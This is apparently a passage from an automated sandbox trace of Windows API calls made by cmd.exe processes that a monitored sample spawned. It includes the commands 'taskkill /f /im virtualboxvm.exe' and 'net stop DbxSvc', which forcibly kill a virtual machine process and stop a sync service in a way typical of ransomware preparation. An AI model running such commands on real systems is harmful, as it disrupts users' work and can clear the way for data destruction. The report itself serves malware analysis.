FreeEnvironmentStringsW (penv=0x4640e0) returned 1 [0061.682] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.682] GetProcessHeap () returned 0x450000 [0061.682] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4656c0 | out: hHeap=0x450000) returned 1 [0061.682] GetProcessHeap () returned 0x450000 [0061.682] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x400e) returned 0x466a60 [0061.682] GetProcessHeap () returned 0x450000 [0061.682] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4e) returned 0x462db0 [0061.682] GetProcessHeap () returned 0x450000 [0061.682] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x466a60 | out: hHeap=0x450000) returned 1 [0061.682] GetConsoleOutputCP () returned 0x1b5 [0061.807] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0061.807] GetUserDefaultLCID () returned 0x409 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34f5a8, cchData=128 | out: lpLCData="0") returned 2 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34f5a8, cchData=128 | out: lpLCData="0") returned 2 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34f5a8, cchData=128 | out: lpLCData="1") returned 2 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0061.808] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0061.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0061.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0061.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0061.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0061.809] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0061.810] GetProcessHeap () returned 0x450000 [0061.810] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20c) returned 0x462e08 [0061.810] GetConsoleTitleW (in: lpConsoleTitle=0x462e08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0061.810] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0061.810] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0061.810] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0061.810] GetProcessHeap () returned 0x450000 [0061.810] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x400a) returned 0x466a60 [0061.811] GetProcessHeap () returned 0x450000 [0061.811] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x466a60 | out: hHeap=0x450000) returned 1 [0061.811] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0061.811] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0061.811] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0061.811] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0061.811] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0061.811] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0061.811] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0061.811] GetProcessHeap () returned 0x450000 [0061.811] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x58) returned 0x463020 [0061.811] GetProcessHeap () returned 0x450000 [0061.811] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a) returned 0x465760 [0061.812] GetProcessHeap () returned 0x450000 [0061.812] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3a) returned 0x463080 [0061.813] GetConsoleTitleW (in: lpConsoleTitle=0x34f2a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.813] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0061.813] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0061.813] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0061.813] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0061.813] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0061.813] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0061.813] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0061.813] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0061.813] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0061.813] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0061.813] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0061.813] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0061.813] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0061.813] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0061.813] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0061.813] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0061.813] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0061.813] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0061.814] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0061.814] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0061.814] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0061.814] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0061.814] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0061.814] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0061.814] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0061.814] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0061.814] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0061.814] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0061.814] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0061.814] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0061.814] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0061.814] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0061.814] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0061.814] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0061.814] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0061.814] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0061.814] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0061.814] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0061.814] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0061.814] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0061.814] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0061.814] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0061.814] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0061.814] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0061.814] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0061.814] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0061.814] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0061.814] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0061.814] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0061.814] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0061.814] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0061.814] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0061.814] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0061.815] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0061.815] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0061.815] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0061.815] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0061.815] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0061.815] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0061.815] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0061.815] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0061.815] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0061.815] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0061.815] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0061.815] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0061.815] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0061.815] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0061.815] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0061.815] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0061.815] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0061.815] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0061.815] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0061.815] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0061.815] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0061.815] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0061.815] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0061.815] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0061.815] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0061.815] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0061.815] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0061.815] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0061.815] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0061.815] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0061.815] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0061.815] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0061.815] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0061.815] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0061.816] GetProcessHeap () returned 0x450000 [0061.816] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x210) returned 0x4630c8 [0061.816] GetProcessHeap () returned 0x450000 [0061.816] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x4632e0 [0061.816] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0061.816] GetProcessHeap () returned 0x450000 [0061.816] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x418) returned 0x4507f0 [0061.816] SetErrorMode (uMode=0x0) returned 0x0 [0061.816] SetErrorMode (uMode=0x1) returned 0x0 [0061.816] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4507f8, lpFilePart=0x34edc0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34edc0*="Desktop") returned 0x25 [0061.816] SetErrorMode (uMode=0x0) returned 0x1 [0061.816] GetProcessHeap () returned 0x450000 [0061.816] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4507f0, Size=0x66) returned 0x4507f0 [0061.816] GetProcessHeap () returned 0x450000 [0061.817] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4507f0) returned 0x66 [0061.817] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0061.817] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0061.817] GetProcessHeap () returned 0x450000 [0061.817] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x120) returned 0x463338 [0061.817] GetProcessHeap () returned 0x450000 [0061.817] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x238) returned 0x450860 [0061.823] GetProcessHeap () returned 0x450000 [0061.823] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x450860, Size=0x122) returned 0x450860 [0061.823] GetProcessHeap () returned 0x450000 [0061.823] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x450860) returned 0x122 [0061.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0061.823] GetProcessHeap () returned 0x450000 [0061.823] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe0) returned 0x463460 [0061.823] GetProcessHeap () returned 0x450000 [0061.823] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x463460, Size=0x76) returned 0x463460 [0061.823] GetProcessHeap () returned 0x450000 [0061.823] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x463460) returned 0x76 [0061.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0061.824] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x34eb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb3c) returned 0xffffffff [0061.824] GetLastError () returned 0x2 [0061.824] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x34eb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb3c) returned 0xffffffff [0061.824] GetLastError () returned 0x2 [0061.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0061.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x34eb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb3c) returned 0x4634e0 [0061.824] GetProcessHeap () returned 0x450000 [0061.824] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x463520 [0061.824] FindClose (in: hFindFile=0x4634e0 | out: hFindFile=0x4634e0) returned 1 [0061.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x34eb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb3c) returned 0xffffffff [0061.824] GetLastError () returned 0x2 [0061.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x34eb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34eb3c) returned 0x4634e0 [0061.825] GetProcessHeap () returned 0x450000 [0061.825] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x463520, Size=0x4) returned 0x463520 [0061.825] FindClose (in: hFindFile=0x4634e0 | out: hFindFile=0x4634e0) returned 1 [0061.825] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0061.825] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0061.825] GetConsoleTitleW (in: lpConsoleTitle=0x34f034, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.825] InitializeProcThreadAttributeList (in: lpAttributeList=0x34eebc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34ef84 | out: lpAttributeList=0x34eebc, lpSize=0x34ef84) returned 1 [0061.825] UpdateProcThreadAttribute (in: lpAttributeList=0x34eebc, dwFlags=0x0, Attribute=0x60001, lpValue=0x34ef7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34eebc, lpPreviousValue=0x0) returned 1 [0061.825] GetStartupInfoW (in: lpStartupInfo=0x34ee78 | out: lpStartupInfo=0x34ee78*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0061.825] GetProcessHeap () returned 0x450000 [0061.825] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4634e0 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0061.825] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0061.826] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0061.826] GetProcessHeap () returned 0x450000 [0061.826] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4634e0 | out: hHeap=0x450000) returned 1 [0061.826] GetProcessHeap () returned 0x450000 [0061.826] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xa) returned 0x45ff30 [0061.826] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0061.828] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im virtualboxvm.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34ef18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im virtualboxvm.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34ef64 | out: lpCommandLine="taskkill /f /im virtualboxvm.exe", lpProcessInformation=0x34ef64*(hProcess=0x78, hThread=0x74, dwProcessId=0x664, dwThreadId=0x694)) returned 1 [0062.046] CloseHandle (hObject=0x74) returned 1 [0062.046] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0062.046] GetProcessHeap () returned 0x450000 [0062.046] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x465f20 | out: hHeap=0x450000) returned 1 [0062.047] GetEnvironmentStringsW () returned 0x465f20* [0062.047] GetProcessHeap () returned 0x450000 [0062.047] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb36) returned 0x4640e0 [0062.047] FreeEnvironmentStringsW (penv=0x465f20) returned 1 [0062.047] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0068.052] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34ee58 | out: lpExitCode=0x34ee58*=0x80) returned 1 [0068.053] CloseHandle (hObject=0x78) returned 1 [0068.053] _vsnwprintf (in: _Buffer=0x34efa0, _BufferCount=0x13, _Format="%08X", _ArgList=0x34ee64 | out: _Buffer="00000080") returned 8 [0068.053] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0068.053] GetProcessHeap () returned 0x450000 [0068.053] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4640e0 | out: hHeap=0x450000) returned 1 [0068.053] GetEnvironmentStringsW () returned 0x4640e0* [0068.053] GetProcessHeap () returned 0x450000 [0068.053] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb5c) returned 0x4695c8 [0068.054] FreeEnvironmentStringsW (penv=0x4640e0) returned 1 [0068.054] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0068.054] GetProcessHeap () returned 0x450000 [0068.054] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4695c8 | out: hHeap=0x450000) returned 1 [0068.054] GetEnvironmentStringsW () returned 0x4640e0* [0068.054] GetProcessHeap () returned 0x450000 [0068.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb5c) returned 0x4695c8 [0068.054] FreeEnvironmentStringsW (penv=0x4640e0) returned 1 [0068.054] GetProcessHeap () returned 0x450000 [0068.054] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45ff30 | out: hHeap=0x450000) returned 1 [0068.054] DeleteProcThreadAttributeList (in: lpAttributeList=0x34eebc | out: lpAttributeList=0x34eebc) [0068.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.054] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.054] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.055] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.055] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.055] SetConsoleInputExeNameW () returned 0x1 [0068.055] GetConsoleOutputCP () returned 0x1b5 [0068.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.055] exit (_Code=128) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1d25e000" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop DbxSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 35 os_tid = 0x7cc [0061.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36f7a4 | out: lpSystemTimeAsFileTime=0x36f7a4*(dwLowDateTime=0x9498d830, dwHighDateTime=0x1d57b18)) [0061.617] GetCurrentProcessId () returned 0x40c [0061.617] GetCurrentThreadId () returned 0x7cc [0061.617] GetTickCount () returned 0x1149d59 [0061.617] QueryPerformanceCounter (in: lpPerformanceCount=0x36f79c | out: lpPerformanceCount=0x36f79c*=18183839825) returned 1 [0061.618] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0061.618] __set_app_type (_Type=0x1) [0061.618] __p__fmode () returned 0x74eb31f4 [0061.618] __p__commode () returned 0x74eb31fc [0061.618] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0061.618] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0061.619] GetCurrentThreadId () returned 0x7cc [0061.619] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7cc) returned 0x60 [0061.619] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0061.619] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0061.619] SetThreadUILanguage (LangId=0x0) returned 0x409 [0061.619] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0061.619] 